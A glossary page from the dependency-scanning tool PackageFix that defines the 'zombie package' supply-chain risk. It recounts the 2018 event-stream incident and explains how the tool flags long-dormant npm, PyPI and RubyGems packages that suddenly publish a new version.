PackageFix / Glossary / Zombie Package

Zombie Package

npm · supply chain
Definition

A zombie package is an informal term for an open source package that went quiet for an extended period (months to years with no updates) and then unexpectedly published a new version. This pattern is a known indicator of a compromised maintainer account — an attacker gains access, publishes a malicious update, and relies on the package's existing install base to spread the payload.

Why dormancy followed by activity is suspicious

Legitimate maintainers tend to follow predictable patterns — regular releases, changelogs, GitHub activity. When a package goes completely silent for over a year and then suddenly releases a new version, one of a few things is happening: the maintainer came back, the project was abandoned and then revived, or someone else now has access to the account.

Attackers specifically target dormant packages because they have established trust — hundreds of thousands of weekly downloads, no recent scrutiny, maintainers who may not even be monitoring the account anymore. It's a much easier target than a recently-updated popular package with active maintainers watching for unusual activity.

The event-stream attack — the original zombie

In 2018, the npm package event-stream had over 2 million weekly downloads. The original maintainer handed it off to a stranger who seemed trustworthy. The new maintainer added a dependency called flatmap-stream containing malicious code targeting a specific Bitcoin wallet. The attack ran undetected for 2.5 months before a developer noticed.

This pattern has repeated dozens of times since. The attacker doesn't even need to hack anything — they just ask to take over an abandoned package and the original maintainer says yes.

How PackageFix detects zombie packages

PackageFix fetches the npm registry's publish history for each package. If a package was dormant for more than 24 months and published a new version within the last 72 hours with more than 100,000 weekly downloads, it gets flagged with a 🧟 ZOMBIE badge: "Updated 4 hours ago after 18 months of inactivity — may indicate compromised maintainer account."

Check your dependencies for CVEs, CISA KEV entries, and supply chain risks.

Open PackageFix →

Free · No signup · No CLI · Runs in your browser

Common questions

Should I avoid all packages that haven't been updated recently?
Not necessarily — some packages are just stable and don't need updates. The concern is specifically the combination of long dormancy followed by a sudden update, especially in packages with large install bases. A package that hasn't been updated in 2 years and isn't about to be updated is lower risk than one that just got its first update in 2 years.
Is there a registry-level protection against zombie package attacks?
npm and PyPI have implemented some protections — 2FA requirements for popular packages, email alerts on publishes. But they can't prevent all cases. A legitimate maintainer account that gets phished isn't something a registry can automatically detect.
What should I do if PackageFix flags a zombie package?
Don't upgrade to the new version until you've reviewed the changes. Check the package's GitHub repo for the release notes, review the actual code diff, and look for discussion in the issues. If the new version adds new dependencies, network calls, or shell commands, be very cautious.
Does this only apply to npm?
PackageFix checks dormancy patterns for npm, PyPI, and RubyGems. The same attack pattern applies to all ecosystems — any package registry where accounts can be compromised or handed off is potentially affected.

Related guides

Supply Chain Attack

The broader attack category

5 Supply Chain Attacks

npm audit misses these

Dependency Scanning

How to detect these

npm Security Guide

All npm vulnerability guides